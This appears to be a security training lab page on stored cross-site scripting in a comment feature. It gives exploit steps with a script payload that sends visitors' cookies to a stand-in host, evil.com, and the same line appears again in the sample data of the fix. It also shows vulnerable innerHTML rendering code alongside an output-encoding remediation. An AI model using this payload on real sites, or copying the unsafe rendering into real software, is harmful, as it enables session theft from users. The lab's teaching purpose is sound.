Stored XSS in Comments

Easy
#xss
#owasp-a03
#stored

Overview

This lab demonstrates stored Cross-Site Scripting where malicious JavaScript is persisted in the database and rendered unsanitized to all users viewing the page.

Scenario

The application has a comment feature. Comments are stored in the database and rendered directly into the page HTML without any sanitization or encoding.

Exploit Steps

  1. Navigate to the comments section
  2. Submit a comment containing: <script>document.location='https://evil.com/steal?c='+document.cookie</script>
  3. Observe the script executes when any user views the page

routes/comments.js
// Vulnerable: comment bodies are returned exactly as stored and rendered raw by the client
app.get('/api/comments', (req, res) => {
  const comments = db.query('SELECT * FROM comments');
  res.json(comments);
});

// Client-side rendering
function renderComments(comments) {
  // ❌ innerHTML parses c.body as HTML, so stored markup becomes live DOM
  container.innerHTML = comments
    .map(c => `<div class="comment">${c.body}</div>`)
    .join('');
}

This code contains a known vulnerability. Never deploy code like this in production. Use the Secure Mode toggle to see the remediation.
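
One way to close the sink shown above, as an added example that is not the lab's own Secure Mode code: comment bodies are output-encoded before they are placed in markup, or assigned through textContent so they are never parsed. The names escapeHtml, renderCommentsSafe, renderCommentsDom and sampleComments are hypothetical, and the sample rows are constructed.

```javascript
// Added example (not the lab's code): keep stored comment bodies as text.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode every character that is significant in HTML text or quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Same markup as the lab's renderComments, but c.body is encoded first,
// so the result is safe to hand to an HTML sink.
function renderCommentsSafe(comments) {
  return comments
    .map((c) => `<div class="comment">${escapeHtml(c.body)}</div>`)
    .join('');
}

// Browser variant: build nodes and set textContent, which never parses markup.
// `doc` is the document object, passed in so the function can be tested.
function renderCommentsDom(container, comments, doc) {
  container.replaceChildren(
    ...comments.map((c) => {
      const div = doc.createElement('div');
      div.className = 'comment';
      div.textContent = c.body; // stored verbatim, displayed as text
      return div;
    })
  );
}

// Constructed sample rows, including the comment from the exploit steps.
const sampleComments = [
  { id: 1, body: 'Nice post & thanks!' },
  { id: 2, body: "<script>document.location='https://evil.com/steal?c='+document.cookie</script>" },
];

console.log(renderCommentsSafe(sampleComments));
```

Encoding happens at output time, so the database can keep the original comment text and each rendering context applies its own encoding.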